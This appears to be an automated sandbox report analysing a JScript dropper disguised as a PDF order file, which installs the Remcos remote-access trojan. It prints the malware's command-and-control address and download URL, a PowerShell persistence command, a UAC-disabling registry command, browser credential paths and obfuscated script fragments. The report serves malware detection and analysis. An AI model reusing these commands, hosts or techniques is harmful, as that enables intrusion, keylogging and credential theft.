Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Specifications PDF.js

Overview

General Information

Sample Name:Order Specifications PDF.js
Analysis ID:737570
MD5:2f2dd87407ef0c27a76906745df56ec0
SHA1:cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
SHA256:c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
Tags:jsRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Copy file to startup via Powershell
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Remcos RAT
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
JavaScript source code contains functionality to generate code involving a shell, file or stream
Drops PE files to the startup folder
Writes to foreign memory regions
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Powershell drops PE file
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • VNZVNCXKKJSF.exe (PID: 5516 cmdline: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)
      • powershell.exe (PID: 5224 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegSvcs.exe (PID: 480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • Systedbddfm.exe (PID: 820 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)
    • powershell.exe (PID: 3712 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
{"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
SourceRuleDescriptionAuthorStrings
0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x66a28:$a1: Remcos restarted by watchdog!
    • 0x66f80:$a3: %02i:%02i:%02i:%03i
    • 0x67305:$a4: * Remcos v
    0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0xdd518:$a1: Remcos restarted by watchdog!
        • 0x152b78:$a1: Remcos restarted by watchdog!
        • 0xdda70:$a3: %02i:%02i:%02i:%03i
        • 0x1530d0:$a3: %02i:%02i:%02i:%03i
        • 0xdddf5:$a4: * Remcos v
        • 0x153455:$a4: * Remcos v
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        13.0.RegSvcs.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          13.0.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          13.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          13.0.RegSvcs.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 6 entries

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine|base64offset|contains: r^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, ParentProcessId: 5516, ParentProcessName: VNZVNCXKKJSF.exe, ProcessCommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', ProcessId: 5224, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 480, TargetFilename: C:\ProgramData\remcos\logs.dat
            Timestamp:192.168.2.68.8.8.858595532012811 11/03/22-23:35:55.641128
            SID:2012811
            Source Port:58595
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Order Specifications PDF.jsReversingLabs: Detection: 26%
            Source: Order Specifications PDF.jsVirustotal: Detection: 25%Perma Link
            Source: Yara matchFile source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepoAvira URL Cloud: Label: phishing
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exeAvira URL Cloud: Label: malware
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_gAvira URL Cloud: Label: phishing
            Source: tgc8x.tkVirustotal: Detection: 5%Perma Link
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exeVirustotal: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exeReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exeJoe Sandbox ML: detected
            Source: 13.0.RegSvcs.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 10.0.VNZVNCXKKJSF.exe.540000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
            Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

            Software Vulnerabilities

            barindex
            Source: Order Specifications PDF.jsReturn value : ['uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
